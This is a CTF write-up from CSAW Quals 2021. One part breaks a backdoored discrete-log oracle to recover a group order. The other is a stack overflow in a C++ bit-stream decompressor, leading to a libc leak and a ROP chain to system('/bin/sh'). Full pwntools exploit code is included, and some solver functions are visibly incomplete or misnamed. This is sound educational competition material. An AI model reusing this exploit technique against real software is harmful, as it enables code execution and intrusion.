CSAW CTF Quals 2021

September 13, 2021


This challenge implements a kleptographic backdoor for discrete logarithms, similar to this. The idea is to generate an RSA group, carefully choosing the primes to embed a smooth-order subgroup. If you know the subgroup’s order, you can implement the Pohlig-Hellman algorithm and solve discrete logarithms. Otherwise, you’re stuck.

We get an oracle which computes discrete logarithms using the backdoor. Given g^x, it will return the 833rd bit of x. Also, we know that the unknown group order is 1006 bits.

We’re going to solve the challenge by recovering the group order, bit by bit. We start off with the MSB, which is guaranteed to be 1. Hence, our estimate for the group order is x = 2^1005. Next, we’ll query the oracle with g^(x + 2^1004). If the oracle returns 1, we know that x + 2^1004 has wrapped around, and therefore exceeds, the order. If the oracle returns 0, we will update our estimate to be x + 2^1004. In this manner, we can iteratively recover the upper 122 bits of the group order.

The next bit corresponds with the oracle’s output, which is tricky to handle. We’ll just guess this bit, update our estimate x, and move on to recovering the lower 883 bits of the group order. Consider -x modulo the group order, which is an 883-bit integer y. Notice that the group order is equal to x + y, so it suffices to recover y.

To recover y, we’ll come up with an algorithm to solve 883-bit logarithms and apply it to h = g^(-x). The idea is to perform a binary search, where the lower bound is 0 and the upper bound is 2^883. For any guess z, we’ll query the oracle with h * g^z. The oracle will return 1 if y + z is at least 2^883, and 0 otherwise. The binary search will find the z such that y + z = 2^883 - 1, and then we solve for y.

Now that we have the group order, we can compute discrete logarithms ourselves. The order’s factorization is conveniently on factor.db, and the rest of the challenge is fairly straightforward.

from tqdm import tqdm
from pwn import process, remote

n = ...
g = 2
nbits = 1006

nc = remote('crypto.chal.csaw.io', 5010)
nc.recvuntil('FLAG = ')

def query(y):
  return int(nc.recvline())

def get_high_bits_of_order():
  x = 2**(nbits - 1)
  assert query(pow(g, x, n)) == 0
  for i in tqdm(range(nbits - 2, nbits - 123, -1)):
    if query(pow(g, x + 2**i, n)) == 0:
      x += 2**i
  return x

def solve_small_logarithm(h):
  z = 0
  for i in tqdm(range(nbits - 123 - 1, -1, -1)):
    if query(h * pow(g, z + 2**i, n)  % n) == 0:
      z += 2**i
  y = 2**(nbits - 123) - 1 - z
  assert pow(g, y, n) == h
  return y

x = get_high_bits()

guess = 0 # could also be 1
x += guess * 2**883

y = solve_small_logarithm(pow(g, -x, n))
order = x + y
from Crypto.Cipher import AES
from Crypto.Hash import SHA256

n = ...
g = 2
publ = ...
alice = ...
flag = bytes.fromhex('6e0..69b')

R = Integers(n)
g = R(g)
publ = R(publ)
alice = R(alice)

order = ...

priv = discrete_log(publ, g, order)
shared = alice^priv

key = SHA256.new(str(shared).encode()).digest()
cipher = AES.new(key, AES.MODE_CTR, nonce=bytes(8))


This is a C++ pwn that decompresses an input string into an output string, both of type std::string. Under the hood, they are abstracted into Bitstream objects. The input bitstream serializes data, opcodes, and the output byte length.

struct std::basic_string_view
    uint64_t m_len;
    char* m_str;

struct Bitstream
    struct std::basic_string_view view;
    int64_t needle;

The vulnerability lies in opcode 3, where the output stream reads bits from earlier in the stream and writes them to the needle. During this process, we can read before and write past the allocated buffer.

This is not that impressive if the buffer lies on the heap. Even if there were an interesting heap overflow, the subsequent bounds check would immediately abort the program. Fortunately, std::basic_string is equipped with a small optimization – it uses a buffer on the stack if its length does not exceed 15 bytes.

_Alloc_hider    _M_dataplus;
size_type       _M_string_length;
enum { _S_local_capacity = 15 / sizeof(_CharT) };
  _CharT        _M_local_buf[_S_local_capacity + 1];
  size_type     _M_allocated_capacity;

By declaring a small output length, we’ve obtained a stack overflow! Below is a snapshot of the stack structure taken in main.

gef➤  x/40gx $sp+0x478

0x7fffc790ca28: 0x0000000044434241₀     0x0000000000000000₀
0x7fffc790ca38: 0x000000000000000f₁     0x00007fffc790ca28
0x7fffc790ca48: 0x0000000000000000      0x67a830e6acc54d00
0x7fffc790ca58: 0x00005599b243c330      0x00005599b243b170₂
0x7fffc790ca68: 0x0000000000000000      0x0000000000000000
0x7fffc790ca78: 0x00007fd94a46ab25₃     0x00007fffc790cb68

₀ out_string._M_local_buf
₁ out_stream.view.m_len
₂ _start
₃ __libc_start_main+213

The first thing to do is overwrite out_stream.view.m_len, which is located further down the stack. This allows the output stream’s needle to move freely. I did this by writing ffff, then performing a 0x10-sized repeat.

The next step is to seek forward and update the return address, which is currently __libc_start_main+213. One option is a partial overwrite, but I could not find a working one gadget in the provided libc. Instead I chose to loop back to _start, whose address was already on the stack.

The loop gives enough time to leak a libc address. I found a pointer to main_arena at $sp+0x410 and copied it into the string’s buffer. One thing to note is that Bitstream::get_bit is buggy for negative indices. In particular, if you want the char at _M_local_buf[-x], the least signifcant bit is correct but the upper 7 bits correspond to _M_local_buf[-x+1]. I ended up fixing the leak client-side.

On the second run, I ROP’d to system("/bin/sh").

from pwn import *

context.terminal = ['tmux', 'splitw', '-h']

class Bitstream:
  def __init__(self, size):
    self.bits = []
    self.push(size, 0x14)

  def push(self, x, n):
    self.bits += list(bin(x)[2:].zfill(n))

  def write_bit(self, bit):
    self.push(1, 3)
    self.push(bit, 1)

  def write_char(self, char):
    self.push(2, 3)
    self.push(char & 0xff, 8)

  def write_word(self, word):
    for char in p64(word):

  def repeat(self, offset, n):
    self.push(3, 3)
    self.push(offset, 0xa)
    self.push(n, 0xa)

  def seek(self, offset):
    self.push(4, 3)
    self.push(offset & 0xffff, 16)

  def serialize(self):
    self.push(0, 3)
    return bytes([int(''.join(self.bits[i:i+8][::-1]), 2) for i in range(0, len(self.bits), 8)])

libc = ELF('./libc.so.6')

p = gdb.debug('./cold')


gap = (0x488 - 0x478)*8

bs1 = Bitstream(15)

bs1.repeat(gap, gap)
bs1.seek(-gap - 2*8)

bs1.repeat((0x478 - 0x410)*8, 8*8)

bs1.seek((0x4c8 - 0x478)*8)
bs1.repeat((0x4c8 - 0x4b0)*8, 8*8)


p.recvuntil('Output: ')
libc_leak = bytearray(b'\x00' + p.recvline()[:-1].ljust(7, b'\x00'))
for i in range(len(libc_leak)-1):
  libc_leak[i] &= 0b11111110
  libc_leak[i] |= libc_leak[i+1] & 1
libc_base = u64(libc_leak) - libc.symbols['main_arena']

bs2 = Bitstream(15)

bs2.repeat(gap, gap)
bs2.seek(-gap - 2*8)

bs2.seek((0x4c8 - 0x478)*8)
bs2.write_word(libc_base + 0x27f75) # pop rdi ; ret
bs2.write_word(libc_base + next(libc.search(b'/bin/sh\x00')))
bs2.write_word(libc_base + libc.symbols['system'])